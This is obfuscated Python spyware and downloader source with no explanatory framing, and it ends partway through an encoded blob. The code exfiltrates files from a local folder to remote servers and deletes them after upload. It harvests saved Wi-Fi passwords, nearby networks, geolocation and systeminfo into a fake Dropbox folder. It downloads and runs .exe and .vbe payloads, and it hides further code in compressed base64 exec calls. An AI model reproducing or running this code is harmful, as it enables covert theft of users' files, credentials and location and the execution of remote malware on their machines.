if 85-85:o00%i1IIi11111i%oOOOo0o0O
except:
pass
if 82-82:i11iIiiIii-i1IIi11111i*OoooooooOO/O0OOo
with open(II+O0oOO0O[0],"rb")as i1:
oOo=base64.b64encode(i1.read())
if 75-75:o0Oo+o0OO0
try:
OoooO0oO=open(II+OOoOoo,"a")
OoooO0oO.write(oOo)
OoooO0oO.close()
except:
pass
os.remove(II+O0oOO0O[0])
if 49-49:Oooo0000/Oo0ooO0oo0oO.oO0OooOoO
del O0oOO0O[0]
if 68-68:i11iIiiIii%o00+i11iIiiIii
if 31-31:oO0OooOoO.o0Oo
if 1-1:o0OO0/o00ooo0%i1IIi11111i*I11i1i11i1I.i11iIiiIii
time.sleep(5)
try:
if 2-2:o00*O0OOo-iIii1I11I1II1+o0Oo.Oo0oO0ooo%i1IIi11111i
for O00,oO0O,OOoO000O0OO in os.walk(II):
for iII11i in OOoO000O0OO:
O0O00o0OOO0=os.path.join(O00,iII11i)
shutil.move(O0O00o0OOO0,oOoOo00oOo+iII11i)
except:
pass
if 92-92:i1IIi11111i
if 25-25:o0OO0-o0Oo/OoooooooOO/o00ooo0
def II111iiiI1Ii():
try:
o0O0OOO0Ooo=requests.get(o0OOO)
if "<Response [200]>"==str(o0O0OOO0Ooo):
iiIiI()
else:
I1()
if 86-86:I1i1iI1i-Oooo0000-Oo0ooO0oo0oO*i1IIi11111i
except:
pass
if 66-66:OoooooooOO+O0
if 11-11:O0OOo+OoooooooOO-Oo0ooO0oo0oO/o00ooo0+o0OO0.oO0OooOoO
def iiIiI():
try:
for i1Iii1i1I,oO0O,OOoO000O0OO in os.walk(oOoOo00oOo):
for OOoO00 in OOoO000O0OO:
if OOoO00.endswith(".gkg("):
IiI111111IIII="PSLtx"
elif OOoO00.endswith(".cat("):
IiI111111IIII="PSLpg"
elif OOoO00.endswith(".mvc("):
IiI111111IIII="PSLzp"
elif OOoO00.endswith(".ugzy("):
IiI111111IIII="PSLlo"
else:
IiI111111IIII="PSLge"
i1Ii=OOoO00
ii111iI1iIi1=open(oOoOo00oOo+i1Ii,"r")
OOO=ii111iI1iIi1.read()
if 68-68:oO0OooOoO+O0OOo
try:
I1I1I=o0OOO
OoOO000={'namepc':str(OooO0OO),'nadir':"02",'menrut0':IiI111111IIII,'menfile0':i1Ii,'mens0':OOO,'submit':'submit'}
i1Ii11i1i=requests.post(I1I1I,data=OoOO000)
ii111iI1iIi1.close()
if 91-91:Oo0ooO0oo0oO
time.sleep(1)
if "<Response [200]>"==str(i1Ii11i1i):
os.remove(oOoOo00oOo+i1Ii)
if 95-95:o0Oo+i11iIiiIii
except:
pass
except:
pass
if 6-6:oOOOo0o0O/i11iIiiIii+i1IIi11111i*Oo0oO0ooo
if 80-80:oO0OooOoO
def I1():
try:
o0O0OOO0Ooo=requests.get(I1ii11iIi11i)
if "<Response [200]>"==str(o0O0OOO0Ooo):
O0O()
if 1-1:oO0OooOoO
if 84-84:o00ooo0%oO0OooOoO.i11iIiiIii/Oo0ooO0oo0oO
except:
pass
if 80-80:ooIiII1I1i1i1ii.i11iIiiIii-o00ooo0
if 25-25:Oo0ooO0oo0oO
def O0O():
try:
for i1Iii1i1I,oO0O,OOoO000O0OO in os.walk(oOoOo00oOo):
for OOoO00 in OOoO000O0OO:
if OOoO00.endswith(".gkg("):
IiI111111IIII="PSLtx"
elif OOoO00.endswith(".cat("):
IiI111111IIII="PSLpg"
elif OOoO00.endswith(".mvc("):
IiI111111IIII="PSLzp"
elif OOoO00.endswith(".ugzy("):
IiI111111IIII="PSLlo"
else:
IiI111111IIII="PSLge"
i1Ii=OOoO00
ii111iI1iIi1=open(oOoOo00oOo+i1Ii,"r")
OOO=ii111iI1iIi1.read()
if 62-62:ooO00oOoo+O0
try:
I1I1I=I1ii11iIi11i
OoOO000={'namepc':str(OooO0OO),'nadir':"02",'menrut0':IiI111111IIII,'menfile0':i1Ii,'mens0':OOO,'submit':'submit'}
i1Ii11i1i=requests.post(I1I1I,data=OoOO000)
ii111iI1iIi1.close()
if 98-98:o00ooo0
time.sleep(1)
if "<Response [200]>"==str(i1Ii11i1i):
os.remove(oOoOo00oOo+i1Ii)
except:
pass
except:
pass
if 51-51:o0OO0-Oo0oO0ooo+oO0OooOoO*Oooo0000.O0OOo+Oo0oO0ooo
if 78-78:i11iIiiIii/i1IIi11111i-Oooo0000/ooO00oOoo+Oo0oO0ooo
def oOoooo0O0Oo():
try:
for i1Iii1i1I,oO0O,OOoO000O0OO in os.walk(oOoOo00oOo):
for OOoO00 in OOoO000O0OO:
if OOoO00.endswith(".gkg("):
IiI111111IIII="PSLtx"
elif OOoO00.endswith(".cat("):
IiI111111IIII="PSLpg"
elif OOoO00.endswith(".mvc("):
IiI111111IIII="PSLzp"
elif OOoO00.endswith(".ugzy("):
IiI111111IIII="PSLlo"
else:
IiI111111IIII="PSLge"
i1Ii=OOoO00
ii111iI1iIi1=open(oOoOo00oOo+i1Ii,"rb")
if 76-76:Oooo0000+I11i1i11i1I
try:
I1I1I=IiII
OoOO000={'namepc':str(OooO0OO),'nadir':"02",'menrut0':IiI111111IIII}
OOoO000O0OO={'file':ii111iI1iIi1}
i1Ii11i1i=requests.post(I1I1I,data=OoOO000,files=OOoO000O0OO)
ii111iI1iIi1.close()
if 34-34:o0OO0
time.sleep(1)
if "<Response [200]>"==str(i1Ii11i1i):
os.remove(oOoOo00oOo+i1Ii)
if 89-89:o0OO0*I1i1iI1i*ooIiII1I1i1i1ii+i1IIi11111i-O0OOo
except:
pass
except:
pass
if 8-8:o00ooo0%O0/o0Oo-Oo0oO0ooo
if 43-43:i11iIiiIii+o0OO0*oO0OooOoO*ooIiII1I1i1i1ii*O0
def o00oO0oo0OO():
try:
for i1Iii1i1I,oO0O,OOoO000O0OO in os.walk(oOoOo00oOo):
for OOoO00 in OOoO000O0OO:
if OOoO00.endswith(".gkg("):
IiI111111IIII="PSLtx"
elif OOoO00.endswith(".cat("):
IiI111111IIII="PSLpg"
elif OOoO00.endswith(".mvc("):
IiI111111IIII="PSLzp"
elif OOoO00.endswith(".ugzy("):
IiI111111IIII="PSLlo"
else:
IiI111111IIII="PSLge"
i1Ii=OOoO00
ii111iI1iIi1=open(oOoOo00oOo+i1Ii,"rb")
if 57-57:ooIiII1I1i1i1ii%Oooo0000+o00ooo0-o0OO0
try:
I1I1I=i1i1II
OoOO000={'namepc':str(OooO0OO),'nadir':"02",'menrut0':IiI111111IIII}
OOoO000O0OO={'file':ii111iI1iIi1}
i1Ii11i1i=requests.post(I1I1I,data=OoOO000,files=OOoO000O0OO)
ii111iI1iIi1.close()
if 65-65:O0OOo.I1i1iI1i
time.sleep(1)
if "<Response [200]>"==str(i1Ii11i1i):
os.remove(oOoOo00oOo+i1Ii)
except:
pass
except:
pass
if 39-39:oO0OooOoO/oOOOo0o0O+ooIiII1I1i1i1ii/I1i1iI1i
if 13-13:I11i1i11i1I+O0+i1IIi11111i%o0Oo/o00ooo0.I11i1i11i1I
o0ooo00O0o0()
II111iiiI1Ii()
oOoooo0O0Oo()
o00oO0oo0OO()
if 86-86:Oo0oO0ooo*o00ooo0%i1IIi.Oooo0000.i11iIiiIii
if 56-56:o00%O0-o0Oo
if 100-100:Oooo0000-O0%Oo0oO0ooo*ooO00oOoo+o0Oo
#######################
## ed76bd136f40a23aeffe0aba02f13b9fea3428c19b715aafa6ea9be91e4006ca
import zlib, base64
exec(zlib.decompress(base64.b64decode('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')))
import json
import json as simplejson
import os
import base64
import urllib2
import subprocess
from datetime import datetime
import time
import requests
from uuid import getnode as get_mac
if 64-64:i11iIiiIii
OO0o=datetime.utcnow().strftime('%Y-%m-%d-%H_%M_%S.%f')[:-3]
if 81-81:Iii1I1+OO0O0O%iiiii%ii1I-ooO0OO000o
try:
ii11i='netsh wlan show networks mode=bssid'
oOooOoO0Oo0O=os.popen(ii11i)
iI1=oOooOoO0Oo0O.readlines()
if 43-43:I11i11Ii
ii11i='netsh wlan show interfaces'
oO00oOo=os.popen(ii11i)
OOOo0=oO00oOo.readlines()
Oooo000o=iI1+OOOo0
if 6-6:i1*ii1IiI1i%OOooOOo/I11i/o0O/IiiIII111iI
IiII=[]
iI1Ii11111iIi=[]
i1i1II=[]
if 96-96:o0OO0-Oo0ooO0oo0oO.I1i1iI1i-o00ooo0/o00*Oo0oO0ooo
if 56-56:ooO00oOoo-I1i1iI1i
except:
pass
if 64-64:o0O%ii1IiI1i
for i1I1Iiii1111 in iI1:
if 22-22:I1i1iI1i.o00
try:
(I11,Oo0o0000o0o0)=i1I1Iiii1111.split("BSSID")
(oOo0oooo00o,oO0o0o0ooO0oO)=Oo0o0000o0o0.split(": ")
oo0o0O00=oO0o0o0ooO0oO.replace("\n","")
except:
pass
else:
try:
IiII.append(oo0o0O00)
except:
pass
try:
(oO,i1iiIIiiI111)=i1I1Iiii1111.split("al")
except:
pass
else:
if 62-62:i11iIiiIii-ooO0OO000o
try:
(IIIiI11ii,O000oo)=i1iiIIiiI111.split("%")
try:
if 3-3:o00ooo0+Iii1I1
(IIIiI11ii,O000oo)=i1iiIIiiI111.split(": ")
I1Ii=O000oo.replace("%","")
o0oOo0Ooo0O=I1Ii.replace(" ","")
OO00O0O0O00Oo=o0oOo0Ooo0O.replace("\n","")
if 25-25:I11i%ooO0OO000o-ooO0OO000o.ooO0OO000o
except:
pass
else:
try:
iI1Ii11111iIi.append("-"+OO00O0O0O00Oo)
except:
pass
if 32-32:ii1I.Oo0ooO0oo0oO%ii1IiI1i.I11i
except:
pass
if 42-42:Oo0oO0ooo+o0O
try:
(OOoO000O0OO,iiI1IiI)=i1I1Iiii1111.split("Canal")
except:
try:
(OOoO000O0OO,iiI1IiI)=i1I1Iiii1111.split("Channel")
except:
pass
else:
try:
(II,ooOoOoo0O)=iiI1IiI.split(": ")
OooO0=ooOoOoo0O.replace(" ","")
II11iiii1Ii=OooO0.replace("\n","")
if 70-70:IiiIII111iI/OO0O0O%ooO00oOoo%i11iIiiIii.I11i11Ii
except:
pass
else:
try:
i1i1II.append(II11iiii1Ii)
except:
pass
try:
if 68-68:Oo0ooO0oo0oO+o0OO0.OO0O0O-o00%OO0O0O-ooO00oOoo
oOOO00o='https://location.services.mozilla.com/v1/geolocate?key=test'
if 97-97:Oo0ooO0oo0oO%Oo0ooO0oo0oO+ooO0OO000o*o00ooo0
o0o00o0={"wifiAccessPoints":[]}
if 25-25:i1-o00.iiiii
for I11ii1 in range(len(IiII)):
I11II1i=IiII[I11ii1]
IIIII=iI1Ii11111iIi[I11ii1]
ooooooO0oo=i1i1II[I11ii1]
if 49-49:I11i*OO0O0O/ii1I/i11iIiiIii/I11i
try:
I1i1I1II={"macAddress":IiII[I11ii1],"signalStrength":int(iI1Ii11111iIi[I11ii1]),"channel":int(i1i1II[I11ii1]),"age":int(0)}
except:
pass
o0o00o0["wifiAccessPoints"].append(I1i1I1II)
if 45-45:Oo0oO0ooo.OOooOOo
oOii1i1I1i=json.dumps(o0o00o0,sort_keys=True,indent=4,separators=(',',': '))
o00oOO0=urllib2.urlopen(oOOO00o,oOii1i1I1i).read()
oOoo=simplejson.loads(o00oOO0)
if 8-8:OOooOOo
if 60-60:Oo0ooO0oo0oO/Oo0ooO0oo0oO
except:
pass
if 46-46:I1i1iI1i*o0OO0-ii1IiI1i*IiiIII111iI-Oo0oO0ooo
try:
if 83-83:iiiii
Iii111II="http://maps.google.com/maps?q="+str(oOoo["location"]["lat"])+","+str(oOoo["location"]["lng"])
if 9-9:ii1IiI1i
try:
i11="systeminfo"
O0oo0OO0oOOOo=subprocess.Popen(i11,shell=True,stdout=subprocess.PIPE)
oOoo,i1i1i11IIi=O0oo0OO0oOOOo.communicate()
if 33-33:I11i+o0OO0*ii1IiI1i-i1/IiiIII111iI%I1i1iI1i
II1i1IiiIIi11=os.getenv('LOCALAPPDATA')
with open(II1i1IiiIIi11+"\\Microsoft\\Dropbox\\avatar_cache\\gt.txt",'a')as iI1Ii11iII1:
iI1Ii11iII1.writelines("------------------------GEO---------------------------\n\n\n")
iI1Ii11iII1.writelines(Iii111II+"\n")
iI1Ii11iII1.writelines("\n\n\n-------------------SYSTEMINFO---------------------\n\n\n")
iI1Ii11iII1.writelines(oOoo)
iI1Ii11iII1.close()
if 51-51:ooO0OO000o*ii1IiI1i%I11i*ooO0OO000o%o0O/ooO00oOoo
except:
pass
if 49-49:I11i
for IIii1Ii1 in OOOo0:
try:
(I1II11IiII,OOO0OOo)=IIii1Ii1.split("SSID")
(I1I111,i11iiI111I)=OOO0OOo.split(": ")
II11i1iIiII1=i11iiI111I.replace("\n","")
except:
pass
else:
break
if 17-17:o00
except:
pass
if 62-62:OO0O0O*OOooOOo
try:
i1OOO='netsh wlan show profile name='+'"'+II11i1iIiII1+'"'+' key=clear'
Oo0oOOo=os.popen(i1OOO)
Oo0OoO00oOO0o=Oo0oOOo.readlines()
if 80-80:IiiIII111iI+o0OO0-o0OO0%o00ooo0
OoOO0oo0o=os.getenv('LOCALAPPDATA')
II11i1I11Ii1i=(OoOO0oo0o+"\\Microsoft\\Dropbox\\avatar_cache\\")
if 97-97:ooO00oOoo%o00ooo0*I1i1iI1i+I11i.o0OO0+o0OO0
i11="systeminfo"
O0oo0OO0oOOOo=subprocess.Popen(i11,shell=True,stdout=subprocess.PIPE)
oOoo,i1i1i11IIi=O0oo0OO0oOOOo.communicate()
if 59-59:OO0O0O*i11iIiiIii/o0O*ii1I*Iii1I1
OOo0o=open(II11i1I11Ii1i+OO0o+"-gtn.txt","w")
OOo0o.writelines("------------------------GEO---------------------------\n\n\n")
OOo0o.writelines(Iii111II)
OOo0o.writelines("\n\n\n-----------------CONNECTION DATA--------------------\n\n\n")
OOo0o.writelines(Oo0OoO00oOO0o)
OOo0o.writelines("\n\n\n-------------------NEARBY NETWORKS---------------------\n\n\n")
OOo0o.writelines(iI1)
OOo0o.writelines("\n\n\n-------------------SYSTEMINFO---------------------\n\n\n")
OOo0o.writelines(oOoo)
OOo0o.close()
if 50-50:o00
if 14-14:Oo0ooO0oo0oO%ii1IiI1i*Oo0ooO0oo0oO
except:
pass
if 16-16:OOooOOo.ooO00oOoo+i11iIiiIii
if 38-38:o00*o0OO0.I11i
ooo0OO="%012X"%get_mac()
O0=os.getenv('USERNAME')
ii1ii1ii=ooo0OO+"-"+O0
II1i1IiiIIi11=os.getenv('LOCALAPPDATA')
oooooOoo0ooo="02"
if 6-6:Oo0ooO0oo0oO-I1i1iI1i+OO0O0O-Oo0oO0ooo-i11iIiiIii
if 79-79:OOooOOo-Iii1I1*ii1IiI1i+OOooOOo%Iii1I1*Iii1I1
def oOOo0():
try:
with open("C:\\Python2.7\\DLLs\\date.dll","r")as iI1Ii11iII1:
oo00O00oO=iI1Ii11iII1.readlines()
iIiIIIi=oo00O00oO[8]
ooo00OOOooO=base64.b64decode(iIiIIIi)
O00OOOoOoo0O=ooo00OOOooO.strip()
if 77-77:o00ooo0%o00ooo0*IiiIII111iI-i11iIiiIii
Oo0oO=O00OOOoOoo0O+oooooOoo0ooo+"/"+ii1ii1ii+"/PSLte/file.html"
IIiIi1iI=requests.get(Oo0oO)
i1IiiiI1iI=base64.b64decode(IIiIi1iI.content)
if 49-49:I1i1iI1i/ii1IiI1i.ooO0OO000o
if '404 Not Found' not in IIiIi1iI.content:
with open(II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.exe",'wb')as iI1Ii11iII1:
iI1Ii11iII1.write(i1IiiiI1iI)
if 68-68:i11iIiiIii%o0O+i11iIiiIii
except:
pass
if 31-31:ooO0OO000o.I11i11Ii
try:
Oo0oO=O00OOOoOoo0O+oooooOoo0ooo+"/"+ii1ii1ii+"/PSLtv/file.html"
IIiIi1iI=requests.get(Oo0oO)
i1IiiiI1iI=base64.b64decode(IIiIi1iI.content)
if 1-1:i1/I11i%o00ooo0*o00.i11iIiiIii
if '404 Not Found' not in IIiIi1iI.content:
with open(II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.vbe",'wb')as iI1Ii11iII1:
iI1Ii11iII1.write(i1IiiiI1iI)
if 2-2:o0O*Oo0ooO0oo0oO-OO0O0O+I11i11Ii.IiiIII111iI%o00ooo0
except:
pass
if 92-92:o00ooo0
if 25-25:i1-I11i11Ii/iiiii/I11i
def II111iiiI1Ii():
if 78-78:I1i1iI1i%Oo0oO0ooo+o0O
try:
with open("date.dll","r")as iI1Ii11iII1:
oo00O00oO=iI1Ii11iII1.readlines()
iIiIIIi=oo00O00oO[8]
ooo00OOOooO=base64.b64decode(iIiIIIi)
OOooOoooOoOo=ooo00OOOooO.strip()
if 84-84:o00
Oo0oO=OOooOoooOoOo+oooooOoo0ooo+"/"+ii1ii1ii+"/PSLte/file.html"
IIiIi1iI=requests.get(Oo0oO)
i1IiiiI1iI=base64.b64decode(IIiIi1iI.content)
if 86-86:OOooOOo-I1i1iI1i-ii1IiI1i*o00ooo0
if '404 Not Found' not in IIiIi1iI.content:
with open(II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.exe",'wb')as iI1Ii11iII1:
iI1Ii11iII1.write(i1IiiiI1iI)
if 66-66:iiiii+Iii1I1
except:
pass
if 11-11:Oo0ooO0oo0oO+iiiii-ii1IiI1i/I11i+i1.ooO0OO000o
try:
Oo0oO=OOooOoooOoOo+oooooOoo0ooo+"/"+ii1ii1ii+"/PSLtv/file.html"
IIiIi1iI=requests.get(Oo0oO)
i1IiiiI1iI=base64.b64decode(IIiIi1iI.content)
if 41-41:I1i1iI1i-Iii1I1-Iii1I1
if '404 Not Found' not in IIiIi1iI.content:
with open(II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.vbe",'wb')as iI1Ii11iII1:
iI1Ii11iII1.write(i1IiiiI1iI)
if 68-68:o0OO0%Oo0oO0ooo
except:
pass
if 88-88:OO0O0O-ooO00oOoo+o0OO0
if 40-40:I11i11Ii*I1i1iI1i+o0OO0%o00ooo0
def OOOOOoo0():
try:
time.sleep(04)
ii1=II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.exe"
if os.path.isfile(ii1):
os.startfile(ii1)
if 11-11:o00*I11i11Ii.OO0O0O%iiiii+o00ooo0
except:
pass
if 78-78:ii1IiI1i.o0OO0+ii1IiI1i/Oo0ooO0oo0oO/ii1IiI1i
try:
time.sleep(04)
ii1=II1i1IiiIIi11+"\\Microsoft\\Dropbox\\QuitReports\\file.vbe"
if os.path.isfile(ii1):
os.startfile(ii1)
if 54-54:OOooOOo%o00ooo0
except:
pass
if 37-37:OOooOOo*i1/ooO00oOoo-o00ooo0%ooO0OO000o.IiiIII111iI
if 88-88:o00ooo0.ooO0OO000o*ooO0OO000o%Oo0oO0ooo
oOOo0()
II111iiiI1Ii()
OOOOOoo0()
#######################
## 15d201152a9465497a0f9dd6939e48315b358702c5e2a3c506ad436bb8816da7
import zlib, base64
exec(zlib.decompress(base64.b64decode('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